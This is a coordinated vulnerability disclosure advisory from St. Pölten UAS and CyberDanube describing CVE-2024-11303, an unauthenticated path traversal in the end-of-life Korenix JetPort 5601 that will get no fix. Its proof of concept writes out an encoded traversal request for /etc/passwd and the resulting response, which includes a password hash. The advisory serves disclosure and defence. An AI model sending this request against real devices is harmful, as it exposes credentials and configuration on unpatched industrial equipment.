St. Pölten UAS 20241118-1
-------------------------------------------------------------------------------
                title| Path Traversal
              product| Korenix JetPort 5601
   vulnerable version| 1.2
        fixed version| -
           CVE number| CVE-2024-11303
               impact| High
             homepage| https://www.korenix.com/
                found| 2024-05-24
                   by| P. Oberndorfer, B. Tösch, M. Narbeshuber-Spletzer,
                     | C. Hierzer, M. Pammer
                     | These vulnerabilities were discovery during research at
                     | St.Pölten UAS, supported and coordinated by CyberDanube.
                     |
                     | https://fhstp.ac.at | https://cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"Korenix Technology, a Beijer group company within the Industrial Communication
business area, is a global leading manufacturer providing innovative, market-
oriented, value-focused Industrial Wired and Wireless Networking Solutions.
With decades of experiences in the industry, we have developed various product
lines [...].

Our products are mainly applied in SMART industries: Surveillance, Machine-to-
Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer
base covers different Sales channels, including end-customers, OEMs, system
integrators, and brand label partners. [...]"

Source: https://www.korenix.com/en/about/index.aspx?kind=3


Vulnerable versions
-------------------------------------------------------------------------------
Korenix JetPort 5601v3 / v1.2


Vulnerability overview
-------------------------------------------------------------------------------
1) Path Traversal (CVE-2024-11303)
A path traversal attack for unauthenticated users is possible. This allows
getting access to the operating system of the device and access information
like configuration files and connections to other hosts or potentially other
sensitive information.


Proof of Concept
-------------------------------------------------------------------------------
1) Path Traversal (CVE-2024-11303)
By sending the following request to the following endpoint, a path traversal
vulnerability can be triggered:
-------------------------------------------------------------------------------
GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 10.69.10.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Te: trailers
Connection: keep-alive
-------------------------------------------------------------------------------
Note, that this is only possible when an interceptor proxy or a command line
tool is used. A web browser would encode the characters and the path traversal
would not work.
The response to the latter request is shown below:
-------------------------------------------------------------------------------
HTTP/1.1 200 OK
Server: thttpd/2.19-MX Jun  2 2022
Content-type: text/plain; charset=iso-8859-1
[...]
Accept-Ranges: bytes
Connection: Keep-Alive
Content-length: 86

root::0:0:root:/root:/bin/false
admin:$1$$CoERg7ynjYLsj2j4glJ34.:502:502::/:/bin/true
-------------------------------------------------------------------------------

The vulnerabilities were manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).


Solution
-------------------------------------------------------------------------------
None. Device is End-of-Life.


Workaround
-------------------------------------------------------------------------------
Limit the access to the device and place it within a segmented network.


Recommendation
-------------------------------------------------------------------------------
CyberDanube recommends Korenix customers to upgrade to another device.


Contact Timeline
-------------------------------------------------------------------------------
2024-09-23: Contacting Beijer Electronics Group via cs@beijerelectronics.com.
2024-09-24: Vendor stated, that the device is end-of-life. Contact will ask the
            engineering team if there are any changes.
2024-10-15: Vendor stated, that the advisory can be published. No further
            updates are planned for this device.
2024-11-18: Coordinated disclosure of advisory.


Web: https://www.fhstp.ac.at/
Twitter: https://x.com/fh_stpoelten
Mail: mis@fhstp.ac.at

EOF T. Weber / @2024